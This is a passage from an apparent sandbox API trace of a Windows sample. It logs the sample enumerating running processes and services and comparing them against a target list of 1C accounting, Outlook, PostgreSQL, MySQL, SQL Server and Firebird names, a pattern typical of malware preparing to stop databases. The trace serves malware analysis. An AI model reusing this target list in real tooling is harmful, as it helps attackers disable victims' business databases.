szExeFile="[System Process]")) returned 1 [0247.143] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.143] lstrlenW (lpString="System") returned 6 [0247.143] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0247.143] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0247.143] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.143] lstrlenW (lpString="smss.exe") returned 8 [0247.143] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0247.143] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0247.143] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0247.143] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0247.144] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0247.144] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0247.144] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0247.144] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.144] lstrlenW (lpString="csrss.exe") returned 9 [0247.144] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0247.144] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0247.144] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0247.144] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0247.144] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0247.144] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0247.144] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0247.144] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.144] lstrlenW (lpString="wininit.exe") returned 11 [0247.144] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0247.144] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0247.144] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0247.144] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0247.145] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0247.145] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0247.145] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0247.145] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.145] lstrlenW (lpString="csrss.exe") returned 9 [0247.145] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0247.145] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0247.145] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0247.145] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0247.145] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0247.145] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0247.145] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0247.145] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.145] lstrlenW (lpString="winlogon.exe") returned 12 [0247.145] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0247.145] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0247.145] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0247.145] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0247.146] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0247.146] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0247.146] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0247.146] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.146] lstrlenW (lpString="services.exe") returned 12 [0247.146] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0247.146] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0247.146] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0247.146] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0247.146] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0247.147] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0247.147] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0247.147] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.147] lstrlenW (lpString="lsass.exe") returned 9 [0247.147] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0247.147] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0247.147] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0247.147] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0247.147] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0247.147] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0247.147] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0247.147] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0247.147] lstrlenW (lpString="lsm.exe") returned 7 [0247.147] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0247.147] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0247.147] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0247.147] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0247.147] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0247.148] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0247.148] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0247.148] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.148] lstrlenW (lpString="svchost.exe") returned 11 [0247.148] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0247.148] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0247.148] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.148] lstrlenW (lpString="svchost.exe") returned 11 [0247.149] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0247.149] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.149] lstrlenW (lpString="svchost.exe") returned 11 [0247.149] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0247.149] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0247.149] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.149] lstrlenW (lpString="svchost.exe") returned 11 [0247.150] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0247.150] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.150] lstrlenW (lpString="svchost.exe") returned 11 [0247.150] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0247.150] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0247.150] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.151] lstrlenW (lpString="audiodg.exe") returned 11 [0247.151] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.151] lstrlenW (lpString="svchost.exe") returned 11 [0247.151] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.151] lstrlenW (lpString="svchost.exe") returned 11 [0247.151] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0247.151] lstrlenW (lpString="userinit.exe") returned 12 [0247.152] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.152] lstrlenW (lpString="dwm.exe") returned 7 [0247.152] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.152] lstrlenW (lpString="explorer.exe") returned 12 [0247.152] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.152] lstrlenW (lpString="spoolsv.exe") returned 11 [0247.152] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.153] lstrlenW (lpString="taskhost.exe") returned 12 [0247.153] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.153] lstrlenW (lpString="svchost.exe") returned 11 [0247.153] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0247.153] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0247.153] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0247.154] lstrlenW (lpString="reader_sl.exe") returned 13 [0247.154] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0247.154] lstrlenW (lpString="dllhost.exe") returned 11 [0247.154] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0247.154] CloseHandle (hObject=0x2e8) returned 1 [0247.154] Sleep (dwMilliseconds=0x1f4) [0248.319] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0248.409] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0248.409] GetLastError () returned 0xea [0248.409] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dee5b0 [0248.409] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0248.410] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0248.410] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0248.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0248.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0248.410] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0248.410] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0248.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0248.410] lstrlenW (lpString="AudioSrv") returned 8 [0248.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0248.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0248.410] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0248.410] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0248.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0248.410] lstrlenW (lpString="BFE") returned 3 [0248.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0248.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0248.410] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0248.410] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0248.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0248.410] lstrlenW (lpString="CryptSvc") returned 8 [0248.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0248.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0248.411] lstrlenW (lpString="CscService") returned 10 [0248.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0248.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0248.411] lstrlenW (lpString="DcomLaunch") returned 10 [0248.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0248.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0248.411] lstrlenW (lpString="Dhcp") returned 4 [0248.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0248.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0248.411] lstrlenW (lpString="Dnscache") returned 8 [0248.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0248.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0248.411] lstrlenW (lpString="DPS") returned 3 [0248.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0248.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0248.411] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0248.411] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0248.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0248.412] lstrlenW (lpString="eventlog") returned 8 [0248.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0248.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0248.412] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0248.412] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0248.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0248.412] lstrlenW (lpString="EventSystem") returned 11 [0248.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0248.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0248.412] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0248.412] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0248.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0248.412] lstrlenW (lpString="gpsvc") returned 5 [0248.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0248.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0248.412] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0248.412] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0248.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0248.412] lstrlenW (lpString="LanmanWorkstation") returned 17 [0248.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0248.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0248.412] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0248.412] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0248.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0248.412] lstrlenW (lpString="lmhosts") returned 7 [0248.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0248.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0248.412] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0248.412] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0248.413] lstrlenW (lpString="MMCSS") returned 5 [0248.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0248.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0248.413] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0248.413] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0248.413] lstrlenW (lpString="MpsSvc") returned 6 [0248.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0248.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0248.413] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0248.413] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0248.413] lstrlenW (lpString="NlaSvc") returned 6 [0248.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0248.413] 